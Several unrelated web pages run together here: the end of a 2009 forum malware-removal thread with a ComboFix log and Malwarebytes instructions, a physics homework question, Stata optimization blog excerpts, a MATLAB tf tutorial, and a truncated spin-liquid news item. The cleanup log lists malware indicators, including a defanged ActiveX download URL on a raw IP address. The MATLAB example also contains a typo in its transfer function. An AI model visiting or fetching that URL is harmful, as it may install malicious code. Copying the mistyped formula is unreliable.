2009-07-16 22:05 . 2009-07-14 01:19 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\Lavasoft 2009-07-16 19:30 . 2009-07-16 19:30 -------- d-----w- c:\documents and settings\NetworkService\Application Data\SACore 2009-07-16 19:25 . 2009-07-16 19:25 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\SiteAdvisor 2009-07-16 18:52 . 2008-07-28 03:32 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\avg8 2009-07-14 20:43 . 2005-12-19 18:09 94208 ----a-w- c:\windows\DUMP7714.tmp 2009-07-13 19:30 . 2009-07-13 19:27 -------- d-----w- c:\program files\RegCleaner 2009-07-13 18:59 . 2009-07-13 18:59 164 ----a-w- c:\windows\install.dat 2009-07-13 03:16 . 2009-07-13 03:16 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\{2BAE6915-8510-4B9F-B498-02DA86258AA0} 2009-07-12 21:34 . 2009-07-12 21:34 -------- d-----w- c:\program files\Common Files\Wise Installation Wizard 2009-07-12 19:20 . 2009-07-12 18:42 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\12483594 2009-07-12 18:53 . 2009-05-22 14:25 -------- d-----w- c:\program files\Microsoft Silverlight 2009-07-09 21:20 . 2009-07-05 01:02 -------- d-----w- c:\program files\VstPlugins 2009-07-05 01:01 . 2009-07-05 01:01 -------- d-----w- c:\program files\Outsim 2009-06-23 20:45 . 2009-06-23 20:45 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\AGI 2009-05-27 23:29 . 2009-05-27 23:29 97144 ----a-w- c:\documents and settings\Peterson\Application Data\Move Networks\ie_bin\MovePlayerUpgrade.exe . . . *Note* empty entries & legit default entries are not shown REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "MSMSGS"="c:\program files\Messenger\msmsgs.exe" [2004-10-13 1694208] "DellSupport"="c:\program files\DellSupport\DSAgnt.exe" [2007-03-15 460784] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Apoint"="c:\program files\Apoint\Apoint.exe" [2004-09-13 155648] "IntelWireless"="c:\program files\Intel\Wireless\Bin\ifrmewrk.exe" [2004-10-30 385024] "ATIPTA"="c:\program files\ATI Technologies\ATI Control Panel\atiptaxx.exe" [2005-08-06 344064] "PCMService"="c:\program files\Dell\Media Experience\PCMService.exe" [2004-04-12 290816] "RealTray"="c:\program files\Real\RealPlayer\RealPlay.exe" [2005-12-19 26112] "dla"="c:\windows\system32\dla\tfswctrl.exe" [2005-05-31 122941] "MSKDetectorExe"="c:\program files\McAfee\SpamKiller\MSKDetct.exe" [2006-11-07 1121280] "dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2007-11-15 16384] "CloneDVDElbyDelay"="c:\program files\Elaborate Bytes\CloneDVD\ElbyCheck.exe" [2002-11-02 45056] "CanonMyPrinter"="c:\program files\Canon\MyPrinter\BJMyPrt.exe" [2007-09-14 1603152] "AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe" [2008-10-01 111936] "iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-04-02 342312] "ISUSPM Startup"="c:\program files\Common Files\InstallShield\UpdateService\isuspm.exe" [2005-06-10 249856] c:\docume~1\ALLUSE~1\STARTM~1\Programs\Startup\ Digital Line Detect.lnk - c:\program files\Digital Line Detect\DLG.exe [2005-12-19 24576] Microsoft Office.lnk - c:\program files\Microsoft Office\Office\OSA9.EXE [1999-2-17 65588] [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\IntelWireless] 2004-09-07 22:08 110592 ----a-w- c:\program files\Intel\Wireless\Bin\LgNotify.dll [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager] BootExecute REG_MULTI_SZ autocheck autochk *\0\0lsdelete @="" [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"= "c:\\Program Files\\Common Files\\AOL\\1147898130\\ee\\aolsoftware.exe"= "c:\\Program Files\\Common Files\\AOL\\1147898130\\ee\\aim6.exe"= "c:\\Program Files\\AIM95\\aim.exe"= "c:\\Program Files\\AIM6\\aim6.exe"= "%windir%\\Network Diagnostic\\xpnetdiag.exe"= "c:\\Program Files\\Deusty\\Mojo\\Mojo.exe"= "c:\\Program Files\\iTunes\\iTunes.exe"= R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [7/17/2009 9:02 PM 114768] R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [7/17/2009 9:02 PM 20560] R2 Viewpoint Manager Service;Viewpoint Manager Service;c:\program files\Viewpoint\Common\ViewpointService.exe [2/15/2007 8:58 AM 24652] . - - - - ORPHANS REMOVED - - - - URLSearchHooks-{0BC6E3FA-78EF-4886-842C-5A1258C4455A} - (no file) BHO-{A3BC75A2-1F87-4686-AA43-5347D756017C} - (no file) Toolbar-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file) WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file) HKCU-Run-Aim6 - (no file) Notify-khfEXnNG - khfEXnNG.dll SafeBoot-mcmscsvc SafeBoot-MCODS . ------- Supplementary Scan ------- . uStart Page = hxxp://baseball.fantasysports.yahoo.com/b1/258902 uInternet Connection Wizard,ShellNext = hxxp://www.dell4me.com/mywaybiz IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 DPF: {2E28242B-A689-11D4-80F2-0040266CBB8D} - hxxp://125.206.34.118/cgi-bin/kxhcm10.ocx FF - ProfilePath - c:\docume~1\Peterson\APPLIC~1\Mozilla\Firefox\Profiles\6ehew45v.default\ FF - prefs.js: browser.startup.homepage - hxxp://baseball.fantasysports.yahoo.com/b1/258902 FF - plugin: c:\program files\Viewpoint\Viewpoint Media Player\npViewpoint.dll ---- FIREFOX POLICIES ---- c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.enforce_same_site_origin", false); c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.cache_size", 51200); c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.ogg.enabled", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.wave.enabled", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.autoplay.enabled", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.urlbar.autocomplete.enabled", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("capability.policy.mailnews.*.wholeText", "noAccess"); c:\program files\Mozilla Firefox\greprefs\all.js - pref("dom.storage.default_quota", 5120); c:\program files\Mozilla Firefox\greprefs\all.js - pref("content.sink.event_probe_rate", 3); c:\program files\Mozilla Firefox\greprefs\all.js - pref("network.http.prompt-temp-redirect", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("layout.css.dpi", -1); c:\program files\Mozilla Firefox\greprefs\all.js - pref("layout.css.devPixelsPerPx", -1); c:\program files\Mozilla Firefox\greprefs\all.js - pref("gestures.enable_single_finger_input", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("dom.max_chrome_script_run_time", 0); c:\program files\Mozilla Firefox\greprefs\all.js - pref("network.tcp.sendbuffer", 131072); c:\program files\Mozilla Firefox\greprefs\all.js - pref("geo.enabled", true); c:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.remember_cert_checkbox_default_setting", true); c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("browser.search.param.yahoo-fr", "moz35"); c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("browser.search.param.yahoo-fr-cjkt", "moz35"); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.blocklist.level", 2); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.urlbar.restrict.typed", "~"); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.urlbar.default.behavior", 0); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.history", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.formdata", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.passwords", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.cookies", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.cache", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.sessions", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.offlineApps", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.siteSettings", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.history", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.formdata", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.passwords", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.cookies", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.cache", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.sessions", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.offlineApps", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.siteSettings", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.sanitize.migrateFx3Prefs", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.ssl_override_behavior", 2); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("security.alternate_certificate_error_page", "certerror"); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.privatebrowsing.autostart", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.privatebrowsing.dont_prompt_on_enter", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("geo.wifi.uri", "https://www.google.com/loc/json"); . ************************************************************************** catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net Rootkit scan 2009-08-19 14:43 Windows 5.1.2600 Service Pack 2 NTFS scanning hidden processes ... scanning hidden autostart entries ... scanning hidden files ... scan completed successfully hidden files: 0 ************************************************************************** . --------------------- DLLs Loaded Under Running Processes --------------------- - - - - - - - > 'winlogon.exe'(992) c:\windows\system32\Ati2evxx.dll c:\program files\Intel\Wireless\Bin\LgNotify.dll - - - - - - - > 'explorer.exe'(1172) c:\windows\system32\WPDShServiceObj.dll c:\windows\system32\PortableDeviceTypes.dll c:\windows\system32\PortableDeviceApi.dll . ------------------------ Other Running Processes ------------------------ . c:\windows\system32\ati2evxx.exe c:\program files\Intel\Wireless\Bin\EvtEng.exe c:\program files\Intel\Wireless\Bin\S24EvMon.exe c:\program files\Intel\Wireless\Bin\WLKEEPER.exe c:\program files\Alwil Software\Avast4\aswUpdSv.exe c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE c:\program files\Dell\NicConfigSvc\NicConfigSvc.exe c:\program files\Intel\Wireless\Bin\RegSrvc.exe c:\program files\Windows Media Player\wmpnetwk.exe c:\program files\Viewpoint\Viewpoint Manager\ViewMgr.exe c:\program files\Intel\Wireless\Bin\ZCfgSvc.exe c:\windows\system32\ati2evxx.exe c:\windows\system32\wscntfy.exe c:\progra~1\Intel\Wireless\Bin\1XConfig.exe c:\program files\Apoint\ApntEx.exe c:\program files\iPod\bin\iPodService.exe c:\program files\Java\jre1.6.0_02\bin\jucheck.exe . ************************************************************************** . Completion time: 2009-08-19 14:51 - machine was rebooted ComboFix-quarantined-files.txt 2009-08-19 18:50 Pre-Run: 7,953,272,832 bytes free Post-Run: 17,027,739,648 bytes free WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe timeout=2 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS [operating systems] c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect 276 --- E O F --- 2008-07-10 07:01 ### #6 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 20 August 2009 - 08:40 AM Looks much better! Please visit the online Jotti Virus Scanner • Click on Browse button. • Navigate to the following file and upload it. c:\windows\system32\drivers\iymsbpctccdxbvrn.sys • Click on the button. The scanner will check the file with various AV companies. • Copy and paste the results box into a reply to this thread. If Jotti's too busy, try here: Go here: http://www.virustotal.com/en/virustotalf.html ================= If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy. • Make sure you are connected to the Internet. • Double-click on mbam-setup.exe to install the application. • When the installation begins, follow the prompts and do not make any changes to default settings. • When installation has finished, make sure you leave both of these checked: • Update Malwarebytes' Anti-Malware • Launch Malwarebytes' Anti-Malware • Then click Finish. MBAM will automatically start and you will be asked to update the program before performing a scan. • If an update is found, the program will automatically update itself. • Press the OK button to close that box and continue. • If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. Alternatively, you can update through MBAM's interface from a clean computer, copy the definitions (rules.ref) located in C:\Documents and Settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware from that system to a usb stick or CD and then copy it to the infected machine. On the Scanner tab: • Make sure the "Perform Quick Scan" option is selected. • Then click on the Scan button. • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. • The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient. • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found". • Click OK to close the message box and continue with the removal process. Back at the main Scanner screen: • Click on the Show Results button to see a list of any malware that was found. • Make sure that everything is checked, and click Remove Selected. • When removal is completed, a log report will open in Notepad. • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM. • Copy and paste the contents of that report in your next reply and exit MBAM. Note: If MBAM encounters a file that is difficult to remove, you may be asked to reboot your computer so it can proceed with the disinfection process. Regardless if prompted to restart the computer or not, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware. MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you after scanning with MBAM. Please temporarily disable such programs or permit them to allow the changes. If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ======================================================== ### #7 peterocks peterocks • Topic Starter • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 20 August 2009 - 10:13 AM Thank you I have noticed a great improvement in the computer's functioning. The Jotti Virus Scan came back clean for all scans. Here is the log of the Malwarebytes scan: Malwarebytes' Anti-Malware 1.40 Database version: 2664 Windows 5.1.2600 Service Pack 2 8/20/2009 11:02:26 AM mbam-log-2009-08-20 (11-02-26).txt Scan type: Quick Scan Objects scanned: 102844 Time elapsed: 6 minute(s), 28 second(s) Memory Processes Infected: 0 Memory Modules Infected: 0 Registry Keys Infected: 3 Registry Values Infected: 0 Registry Data Items Infected: 0 Folders Infected: 1 Files Infected: 1 Memory Processes Infected: (No malicious items detected) Memory Modules Infected: (No malicious items detected) Registry Keys Infected: HKEY_CLASSES_ROOT\qndsfmao.bvqe (Trojan.FakeAlert) -> Quarantined and deleted successfully. HKEY_CLASSES_ROOT\qndsfmao.toolbar.1 (Trojan.FakeAlert) -> Quarantined and deleted successfully. Registry Values Infected: (No malicious items detected) Registry Data Items Infected: (No malicious items detected) Folders Infected: C:\Documents and Settings\All Users\Application Data\12483594 (Rogue.Multiple) -> Quarantined and deleted successfully. Files Infected: C:\Documents and Settings\All Users\Application Data\12483594\12483594 (Rogue.Multiple) -> Quarantined and deleted successfully. ### #8 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 21 August 2009 - 11:15 AM Sounds good! As long as everything appears to be running smoothly again I'll post some final steps and recommendations for you. We need to remove Combofix now that we're done with it. • Click START then RUN • Now type Combofix /u in the runbox and click OK ================== Now that you are clean, please follow these simple steps in order to keep your computer clean and secure: • Disable and Enable System Restore. - If you are using Windows ME or XP then you should disable and reenable system restore to make sure there are no infected files found in a restore point left over from what we have just cleaned. You can find instructions on how to enable and reenable system restore here: Windows XP System Restore Guide Renable system restore with instructions from tutorial above • Use an AntiVirus Software - It is very important that your computer has an anti-virus software running on your machine. This alone can save you a lot of trouble with malware in the future. See this link for a listing of some online & their stand-alone antivirus programs: Virus, Spyware, and Malware Protection and Removal Resources • Update your AntiVirus Software - It is imperitive that you update your Antivirus software at least once a week (Even more if you wish). If you do not update your antivirus software then it will not be able to catch any of the new variants that may come out. • Use a Firewall - I can not stress how important it is that you use a Firewall on your computer. Without a firewall your computer is succeptible to being hacked and taken over. I am very serious about this and see it happen almost every day with my clients. Simply using a Firewall in its default configuration can lower your risk greatly. For a tutorial on Firewalls and a listing of some available ones see the link below: Understanding and Using Firewalls • Visit Microsoft's Windows Update Site Frequently - It is important that you visit http://www.windowsupdate.com regularly. This will ensure your computer has always the latest security updates available installed on your computer. If there are new updates to install, install them immediately, reboot your computer, and revisit the site until there are no more critical updates. • Install Spybot - Search and Destroy - Install and download Spybot - Search and Destroy with its TeaTimer option. This will provide realtime spyware & hijacker protection on your computer alongside your virus protection. You should also scan your computer with program on a regular basis just as you would an antivirus software. A tutorial on installing & using this product can be found here: Using Spybot - Search & Destroy to remove Spyware , Malware, and Hijackers • Install SpywareBlaster - SpywareBlaster will added a large list of programs and sites into your Internet Explorer settings that will protect you from running and downloading known malicious programs. A tutorial on installing & using this product can be found here: Using SpywareBlaster to protect your computer from Spyware and Malware • Update all these programs regularly - Make sure you update all the programs I have listed regularly. Without regular updates you WILL NOT be protected when new malicious programs are released. Follow this list and your potential for being infected again will reduce dramatically. If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ======================================================== ### #9 peterocks peterocks • Topic Starter • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 21 August 2009 - 12:00 PM I have followed all of your steps and I'm working on updating and scanning. Thank you for everything. It helps so much being able to bring a clean computer back to school and not having to worry about it crashing while I'm typing a paper! I will be donating through your Paypal as a token of my appreciation. Thanks again. ### #10 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 21 August 2009 - 01:00 PM If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ======================================================== #### 0 user(s) are reading this topic 0 members, 0 guests, 0 anonymous users
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8819501399993896, "perplexity": 29916.473013905783}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221209856.3/warc/CC-MAIN-20180815024253-20180815044253-00620.warc.gz"}
https://www.physicsforums.com/threads/self-studier-w-kleppner-kolenkow-question.404135/
# Self-studier w/ kleppner & kolenkow question 1. May 18, 2010 ### pton265 Hi, This is my first post. I'm reviewing mechanics out of K&K and have a question about problem 4.5: "Mass m whirls on a frictionless table, held to a circular motion by a string which passes through a hole in the table. The string is slowly pulled through the hole so that the radius of the circle changes from l1 to l2. Show that the work done in pulling the string equals the increase in kinetic energy of the mass." I'm assuming the mass starts with uniform circular motion at radius l1, and I analyze in polar coordinates with the center of this circle as the origin. My initial intuition about the motion: (1) Angular acceleration is non-zero (positive), but there cannot be a $$\widehat{}\theta$$ component of acceleration (the force is always radial) - which is only true if 2$$\dot{}r$$$$\dot{}\theta$$ = -r$$\ddot{}\theta$$. (2) The only way for the string to do work (increase the magnitude of m's velocity) is if m's trajectory (and, therefore, velocity) has some radial component. That is, the force must at some point have a non-orthogonal component with respect to the trajectory. Since the force is everywhere radial, the $$\widehat{}\theta$$ component of velocity is unchanged, while the radial component of velocity increases (in the negative $$\widehat{}r$$ direction). This statement does not contradict (1), where I state angular acceleration is non-zero (right?!). Physically, all of this corresponds to the mass breaking from uniform circular motion and spiraling inward toward the center of the table (i.e. where the hole is). When it reaches l2, it will NOT be in uniform circular motion because it's velocity must have some radial component (inward). Now, the only solution (http://hep.ucsb.edu/courses/ph21/problems/p7sol.pdf [Broken]) I've found takes (1) to be true, but (2) to be false. The final velocity in the solution has a magnitude such that the velocity can not possibly have a radial component. In other words, once the mass reaches l2, it pops back into uniform circular motion (albeit, with higher velocity). How can the trajectory take this form (i.e. that of consecutively smaller concentric circles)?? Is the solution wrong? If not, where is my error? Please bear in mind that the only assumed knowledge at this point is of translational motion, linear momentum, and the Work-energy theorem in one dimension (KK chs.1-4) - not angular momentum, rotational motion, etc. My apologies if there is already a similar thread - I've searched PF pretty thoroughly. Thanks very much for any and all help... L Last edited by a moderator: May 4, 2017 Can you offer guidance or do you also need help? Draft saved Draft deleted Similar Discussions: Self-studier w/ kleppner & kolenkow question
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9383972883224487, "perplexity": 647.587669843904}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886124662.41/warc/CC-MAIN-20170823225412-20170824005412-00255.warc.gz"}
https://blog.stata.com/tag/optimization/
### Archive Posts Tagged ‘optimization’ ## Programming an estimation command in Stata: Using optimize() to estimate Poisson parameters $$\newcommand{\xb}{{\bf x}} \newcommand{\betab}{\boldsymbol{\beta}}$$I show how to use optimize() in Mata to maximize a Poisson log-likelihood function and to obtain estimators of the variance–covariance of the estimator (VCE) based on independent and identically distributed (IID) observations or on robust methods. This is the eighteenth post in the series Programming an estimation command in Stata. I recommend that you start at the beginning. See Programming an estimation command in Stata: A map to posted entries for a map to all the posts in this series. Using optimize() There are many optional choices that one may make when solving a nonlinear optimization problem, but there are very few that one must make. The optimize*() functions in Mata handle this problem by making a set of default choices for you, requiring that you specify a few things, and allowing you to change any of the default choices. When I use optimize() to solve a Read more… Categories: Programming Tags: ## Programming an estimation command in Stata: A review of nonlinear optimization using Mata $$\newcommand{\betab}{\boldsymbol{\beta}} \newcommand{\xb}{{\bf x}} \newcommand{\yb}{{\bf y}} \newcommand{\gb}{{\bf g}} \newcommand{\Hb}{{\bf H}} \newcommand{\thetab}{\boldsymbol{\theta}} \newcommand{\Xb}{{\bf X}}$$I review the theory behind nonlinear optimization and get more practice in Mata programming by implementing an optimizer in Mata. In real problems, I recommend using the optimize() function or moptimize() function instead of the one I describe here. In subsequent posts, I will discuss optimize() and moptimize(). This post will help you develop your Mata programming skills and will improve your understanding of how optimize() and moptimize() work. This is the seventeenth post in the series Programming an estimation command in Stata. I recommend that you start at the beginning. See Programming an estimation command in Stata: A map to posted entries for a map to all the posts in this series. A quick review of nonlinear optimization We want to maximize a real-valued function $$Q(\thetab)$$, where $$\thetab$$ is a $$p\times 1$$ vector of parameters. Minimization is done by maximizing $$-Q(\thetab)$$. We require that $$Q(\thetab)$$ is twice, continuously differentiable, so that we can use a second-order Taylor series to approximate $$Q(\thetab)$$ in a neighborhood of the point $$\thetab_s$$, $Q(\thetab) \approx Q(\thetab_s) + \gb_s'(\thetab -\thetab_s) + \frac{1}{2} (\thetab -\thetab_s)’\Hb_s (\thetab -\thetab_s) \tag{1}$ where $$\gb_s$$ is the $$p\times 1$$ vector of first derivatives of $$Q(\thetab)$$ evaluated at $$\thetab_s$$ and $$\Hb_s$$ is the $$p\times p$$ matrix of second derivatives of $$Q(\thetab)$$ evaluated at $$\thetab_s$$, known as the Hessian matrix.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8295153975486755, "perplexity": 771.6493558824662}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496668534.60/warc/CC-MAIN-20191114182304-20191114210304-00082.warc.gz"}
http://wikis.controltheorypro.com/MATLAB_tf
MATLAB tf MATLAB tf In order to prevent spam, users must register before they can edit or create articles. ## 1 Introduction to MATLAB's tf command Transfer functions are easily to created in MATLAB using the tf command. (The tf command requires the.) This command accepts two vectors - one for the numerator and one for the denominator. ## 2 Basic Usage for MATLAB's tf command The basic usage of MATLAB's tf command is >> sys = tf(num, den); where: num is a vector representing the coefficients of the numerator and den is a vector representing the coefficients of the denominator. For example, a transfer function like this $LaTeX: H\left( s \right) = \frac{s+2}{s^2+3+10}$ becomes >> num = [1 2]; >> den = [1 3 10]; Notice that MATLAB determines the order from the number of elements in the vectors. If the numerator had been $LaTeX: s^2+2$ then >> num = [1 0 2]; would be the correct vector.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 2, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8868213295936584, "perplexity": 2650.321076144421}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218191396.90/warc/CC-MAIN-20170322212951-00259-ip-10-233-31-227.ec2.internal.warc.gz"}
https://physics.aps.org/synopsis-for/10.1103/PhysRevLett.110.207208
# Synopsis: Pool of Candidate Spin Liquids Grows A new vanadium compound exhibits the telltale features of a quantum spin liquid—a material that resists magnetic ordering down to absolute zero. At low enough temperature, the spins in a magnetic material will typically “freeze” in a particular arrangement. However, certain materials have lattice structures that interfere with, or frustrate, this spin freezing even at absolute zero. Physicists proposed the existence of these quantum “spin liquids” 40 years ago, but experimental evidence emerged only in the last few years. Now, a team of researchers has identified a new spin liquid candidate. As described in Physical Review Letters, the material has unique features that could provide another avenue for studying spin liquid physics. The simplest model of a spin liquid is an antiferromagnet with a triangle-shaped lattice: Interactions between the ions favor antiparallel spins, but the triangular geometry forces two spins to point in the same direction. This frustration causes the spins to constantly fluctuate between different arrangements. The resulting liquidlike state may have relevance in high-temperature superconductivity and future quantum computing technologies. But other than a naturally occurring mineral called herbertsmithite, which has a kagome lattice of corner-sharing triangles, spin liquid behavior hasn’t been observed in any actual materials. In 2011, chemists synthesized a new kagome 